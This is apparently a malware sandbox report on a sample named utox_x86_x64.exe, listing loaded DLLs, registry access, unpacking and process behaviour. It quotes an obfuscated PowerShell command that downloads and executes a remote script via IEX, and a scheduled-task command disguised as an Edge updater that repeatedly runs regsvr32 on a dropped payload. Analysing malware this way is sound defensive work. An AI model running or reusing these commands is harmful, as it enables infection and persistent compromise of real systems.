Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wudfplatform.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: efsadu.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: efsutil.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: cryptui.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: vaultcli.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: credui.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: feclient.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Media Player\wmprph.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Media Player\wmprph.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Windows Media Player\wmprph.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptnet.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: webio.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: devenum.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: msdmo.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: efsadu.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: efsutil.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: cryptui.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: efsutil.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: vaultcli.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: credui.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: cryptui.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: feclient.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: msimg32.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\rekeywiz.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\utox_x86_x64.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32

Jump to behavior

Source: fBcMVl6ns6.lnk

LNK file: ..\..\..\..\Windows\system32\cmd.exe

Source: C:\Users\Public\ajbs50ul.bat

File written: C:\Users\user\AppData\Roaming\M08e.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\System32\OpenWith.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook

Jump to behavior

Source:	Binary string: kernel32.pdbUGP source: regsvr32.exe, 00000009.00000003.1618546473.000000001B330000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1619728740.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632811056.000001F9E0530000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632244742.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdbUGP source: regsvr32.exe, 00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1625000511.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1634556550.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000009.00000003.1604799073.000000001C000000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1606444269.000000001C1F0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629919350.000001F9E0660000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629243425.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: kernel32.pdb source: regsvr32.exe, 00000009.00000003.1618546473.000000001B330000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1619728740.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632811056.000001F9E0530000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632244742.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000009.00000003.1604799073.000000001C000000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1606444269.000000001C1F0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629919350.000001F9E0660000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629243425.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdb source: regsvr32.exe, 00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1625000511.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1634556550.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 9.2.regsvr32.exe.12909ac0.3.raw.unpack, Redist.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 9.2.regsvr32.exe.12909ac0.3.raw.unpack, Redist.cs	.Net Code: CoreMain
Source: 9.3.regsvr32.exe.2554f70.6.raw.unpack, Redist.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 9.3.regsvr32.exe.2554f70.6.raw.unpack, Redist.cs	.Net Code: CoreMain
Source: 9.2.regsvr32.exe.1b040000.4.raw.unpack, Redist.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 9.2.regsvr32.exe.1b040000.4.raw.unpack, Redist.cs	.Net Code: CoreMain
Source: 9.2.regsvr32.exe.2554f70.0.raw.unpack, Redist.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 9.2.regsvr32.exe.2554f70.0.raw.unpack, Redist.cs	.Net Code: CoreMain
Source: 9.3.regsvr32.exe.2554f70.7.raw.unpack, Redist.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 9.3.regsvr32.exe.2554f70.7.raw.unpack, Redist.cs	.Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.35.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.35.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.80.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.80.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.76.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.76.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.32.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.32.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.23.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.23.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.84.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.84.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.53.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.53.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.16.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.16.raw.unpack, Runtime.cs	.Net Code: CoreMain

Obfuscated command line found

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit	Jump to behavior

Suspicious powershell command line found

Source: C:\Users\Public\ajbs50ul.bat	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\rekeywiz.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C0C80C0-8884-4C8C-CCC0-CC80C840C404}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Users\Public\ajbs50ul.bat	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"	Jump to behavior
Source: C:\Windows\System32\rekeywiz.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C0C80C0-8884-4C8C-CCC0-CC80C840C404}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"

Source: utox_x86_x64.exe.3.dr	Static PE information: section name: .rodata
Source: utox_x86_x64.exe.3.dr	Static PE information: section name: .xdata
Source: utox_x86_x64.exe.3.dr	Static PE information: section name: /4
Source: utox_x86_x64.exe.3.dr	Static PE information: section name: /19
Source: utox_x86_x64.exe.3.dr	Static PE information: section name: /31
Source: utox_x86_x64.exe.3.dr	Static PE information: section name: /45
Source: utox_x86_x64.exe.3.dr	Static PE information: section name: /57
Source: utox_x86_x64.exe.3.dr	Static PE information: section name: /70
Source: utox_x86_x64.exe.3.dr	Static PE information: section name: /81
Source: utox_x86_x64.exe.3.dr	Static PE information: section name: /92
Source: ajbs50ul.bat.3.dr	Static PE information: section name: .xdata
Source: M08e.ini.4.dr	Static PE information: section name: .xdata

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFB4B36752B push ebx; iretd	3_2_00007FFB4B36756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFB4B434465 push ebp; iretd	3_2_00007FFB4B434468
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D223E20 push rsi; retf	4_2_00007FF63D3FBAFB
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D223E20 push rbp; retf	4_2_00007FF63D3FBB4B
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D3FBA98 push rbp; retf	4_2_00007FF63D3FBA9B
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2CCA4C push rbp; retf	4_2_00007FF63D3FBB23
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2CCA4C push rsi; retf	4_2_00007FF63D3FBB83
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2CCB54 push rbp; retf	4_2_00007FF63D3FBA1B
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2CCB7C push rsi; retf	4_2_00007FF63D3FB9FB
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D3FBC00 push rbp; retf	4_2_00007FF63D3FBC03
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2CC954 push rsi; retf	4_2_00007FF63D3FBC3B
